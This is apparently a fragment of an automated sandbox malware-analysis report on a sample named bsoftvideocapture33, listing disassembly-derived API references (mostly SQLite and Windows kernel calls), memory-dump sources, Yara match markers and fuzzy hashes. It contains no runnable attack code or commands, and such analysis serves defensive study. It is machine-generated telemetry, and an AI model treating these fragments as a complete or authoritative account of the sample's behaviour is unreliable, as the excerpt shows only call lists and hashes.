                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                                                                        • String ID: offsets
                                                                                                                                        • API String ID: 463808202-2642679573
                                                                                                                                        • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                                                                        • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                                                                        • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                                                                        • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C04D8B
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C04DB7
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C04DC3
                                                                                                                                          • Part of subcall function 02C04BED: __EH_prolog.LIBCMT ref: 02C04BF2
                                                                                                                                          • Part of subcall function 02C04BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02C04CF2
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C04E93
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C04E99
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C04EA0
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C04EA6
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C050A7
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C050AD
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C050B8
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C050C1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2062355503-0
                                                                                                                                        • Opcode ID: bfd96be15794319f011206e81ad9a05d7cb9bf1c17591c1a67a78f29eaa78251
                                                                                                                                        • Instruction ID: fe7d68f746445af58f343d5513be838eff9f15af374bb05970c43f5ec42ee933
                                                                                                                                        • Opcode Fuzzy Hash: bfd96be15794319f011206e81ad9a05d7cb9bf1c17591c1a67a78f29eaa78251
                                                                                                                                        • Instruction Fuzzy Hash: C6B17B31D0025DDFEF25DFA0D880BEEBBB9AF04318F14405AE415B6280DBB55A49CFA1
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                                                                        • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                         • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2903785150-0
                                                                                                                                        • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                                                                        • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                                                                        • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                                                                        • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C03428
                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02C0346B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02C03472
                                                                                                                                        • GetLastError.KERNEL32 ref: 02C03486
                                                                                                                                        • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C034D7
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(00000018), ref: 02C034ED
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02C03518
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                                                                        • String ID: CancelIoEx$KERNEL32
                                                                                                                                        • API String ID: 2902213904-434325024
                                                                                                                                        • Opcode ID: ad024e4ccceb092730c7fc8723a4c39994f962de0a87529f806a03c60235d0fe
                                                                                                                                        • Instruction ID: 8e19b60b95b29ba3df123316406b0cb7872903974986295c4e976a599683f965
                                                                                                                                        • Opcode Fuzzy Hash: ad024e4ccceb092730c7fc8723a4c39994f962de0a87529f806a03c60235d0fe
                                                                                                                                        • Instruction Fuzzy Hash: 11318FB1900355DFDB11EFA4D894B6A7BF9FF89350F0145A9E9059B280CB749904CFA1
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                                                                        • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                                                                        • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                                                                        • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                                                                        • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                         • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3556715608-0
                                                                                                                                        • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                                                                        • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                                                                        • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                                                                        • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403EF1,?,Microsoft Visual C++ Runtime Library,00012010,?,00408574,?,004085C4,?,?,?,Runtime Error!Program: ), ref: 004060FA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00406112
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00406123
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406130
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                        • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                                        • API String ID: 2238633743-4044615076
                                                                                                                                        • Opcode ID: ea984a93ff560351788ad20c29eb99aad13fd5e912c3d8ef3fdbbe59f23fd654
                                                                                                                                        • Instruction ID: df2af2c5de4b25a8c2909cb75962e634be7cb6d7c0604ae4ccb63621d4521f2f
                                                                                                                                        • Opcode Fuzzy Hash: ea984a93ff560351788ad20c29eb99aad13fd5e912c3d8ef3fdbbe59f23fd654
                                                                                                                                        • Instruction Fuzzy Hash: 23018435700211DBC7109FB59FC0A177AE99A99780702053FB686FA2A3DA7888158FAD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                                                                        • API String ID: 0-780898
                                                                                                                                        • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                                                                        • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                                                                        • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                                                                        • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                                                                        • API String ID: 0-2604012851
                                                                                                                                        • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                                                                        • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                                                                        • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                                                                        • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                                                                        APIs
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00408640,00000001,00000000,00000000,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 00406409
                                                                                                                                        • LCMapStringA.KERNEL32(00000000,00000100,0040863C,00000001,00000000,00000000,?,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 00406425
                                                                                                                                        • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00405E87,?,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 0040646E
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 004064A6
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 004064FE
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 00406514
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,00405E87,00000000,00405E87,?,?,00405E87,00200020,00000000,?,00000000), ref: 00406547
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 004065AF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$ByteCharMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 352835431-0
                                                                                                                                        • Opcode ID: 88284e932c36288a6156d60e9a075990b1961716adce78fc703b9783983f64f7
                                                                                                                                        • Instruction ID: c7c9367f903c863ede83e3d284d9543b54c612c6a1cea3deb7ec850cd2334311
                                                                                                                                        • Opcode Fuzzy Hash: 88284e932c36288a6156d60e9a075990b1961716adce78fc703b9783983f64f7
                                                                                                                                        • Instruction Fuzzy Hash: B0517B71900209FFCF229F58DD49A9F7BB9FB48750F11413AF912B12A0D7398961DBA8
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                                                                        • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                                                                          • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                                                                          • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                                                        • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                                                                        • String ID: |
                                                                                                                                        • API String ID: 1576672187-2343686810
                                                                                                                                        • Opcode ID: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                                                                        • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                                                                        • Opcode Fuzzy Hash: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                                                                        • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                                                                          • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                                                                        • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                                                                        • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                                                                        • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                                                                        • API String ID: 652164897-1572359634
                                                                                                                                        • Opcode ID: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                                                                        • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                                                                        • Opcode Fuzzy Hash: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                                                                        • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403E3A
                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,00408574,00000000,?,00000000,00000000), ref: 00403F10
                                                                                                                                        • WriteFile.KERNEL32(00000000), ref: 00403F17
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$HandleModuleNameWrite
                                                                                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                        • API String ID: 3784150691-4022980321
                                                                                                                                        • Opcode ID: 32de02305071a764a4faeeef9d8dd67e214c7308779322260feaa114c606003d
                                                                                                                                        • Instruction ID: ed3ec3965d8bd69fc4b5d81f244bb244573f08a521b35bb9d91034c0cc4ce6b8
                                                                                                                                        • Instruction Fuzzy Hash: 7A319072A002186FDF24EA60CE4AFEA776CAF45305F10057FF584B61D1DAB8AE448A5D
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                                                                                        • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                                                                                        • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                                                                                        • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2352520524-0
                                                                                                                                        • Opcode ID: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                                                                        • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                                                                                        • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                                                                          • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                                                                          • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                                                                          • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                                                                        • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                                                                          • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                                                          • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                                                          • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                                                                                        • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                                                                        • String ID: optimize
                                                                                                                                        • API String ID: 3659050757-3797040228
                                                                                                                                        • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                                                                        • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                                                                                        • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 60965556
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60965714
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6096574B
                                                                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 609657AA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2722129401-0
                                                                                                                                        • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                                                                        • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                                                                                        • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                                                                          • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
